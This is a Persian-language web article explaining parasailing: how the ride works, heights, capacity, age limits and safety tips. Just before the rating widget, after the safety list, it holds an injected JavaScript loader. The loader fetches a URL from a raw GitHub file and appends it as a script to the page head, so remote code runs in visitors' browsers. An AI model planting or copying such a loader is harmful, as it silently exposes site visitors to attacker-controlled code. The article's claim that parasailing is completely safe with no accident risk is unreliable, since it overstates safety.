پاراسل

  • اگر برای شما ها هم سوال پیش آمده که پاراسل چیست؟ و در کجا می توان آن را تجربه کرد؟

    پاراسل چیست؟

    در ورزش یا تفریح چتر بازی روی آب شما باید یک جلیقه نجات و بستن چندین کمربند ایمنی به یک چتر بزرگ وصل می شوید. این چتر به وسیله یک طناب بلند به یک قایق تندرو متصل شده و با حرکت قایق، باد به داخل چتر می پیچد و باعث بلند شدن آن می شود. پس از طی مسیر کوتاه و بلند شدن چتر، در نظر گرفتن عواملی مانند وزش باد، سرعت قایق، تعداد وزن نفرات، قایقران به صورت تدریجی طناب متصل به چتر را شل کرده و مسافرین را به ارتفاعات بالا می فرستد. بیشترن هیجان می توان در لحضه بالا رفتن چتر پرواز تجربه نمود. با تمام شدن اوج گیری چتر و ثابت ماندن آن در یک ارتفاع مشخص، می توان منظره فوق العاده ای از ساحل و دریا بینید. معمولا تایم پاراسل سواری 10 تا 15 دقیقه می باشد. در صورتی که نیاز به تایم اضافه دارید مبایست با شرکت یا قایقران ارائه دهنده این تفریح به توافق برسید و هزینه اضافی لازم را پرداخت نمایید.

    ارتفاع و ظرفیت چتر پرواز

    حدقل ارتفاع با پاراسل 150 متر است. در صورت مثبت بودن یک سری از شرایط می توان تا ارتفاع 500 از سطح دریا نیز بالا رفت و تجربه خاصی را رقم زد. چتر پاراسل در ابعاد و طرح و رنگ های مختلف وجود دارد. همچنین ظرفیت پاراسل ها با توجه به نوع چتر و وزن افراد میتواند تک نفره، دونفره و یا سه نفره باشد. حدقل سن برای استفاده برای این چتر 16 سال می باشد و برای کودکان هم امکان پرواز وجود ندارد مگر این‌که همراه والدین خود باشند و سن آن‌ها به‌حدی رسیده باشد که بتوانند تجهیزات ایمنی را بپوشند.

    ایمنی پاراسل

    این تفریح آبی هیجان‌انگیز کاملا ایمن می‌باشد و نگرانی بابت بروز حادثه و اتفاقات حین استفاده از آن وجود ندارد. اما باز هم رعایت یک سری نکات ضروی بوده و درصد امنیت را بالاتر می‌برد. این موارد عبارتند از:

    • اطمینان پیدا کردن از معتبر بودن کلوپ و سابقه آن و قایقران
    • مطمئن شدن از سالم بودن تجهیزات و کیفیت آن‌ها
    •  یادگیری راه و روش ارتباط با قایقران
    •  انتخاب ارتفاع مناسب و بالا نرفتن زیاد
    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید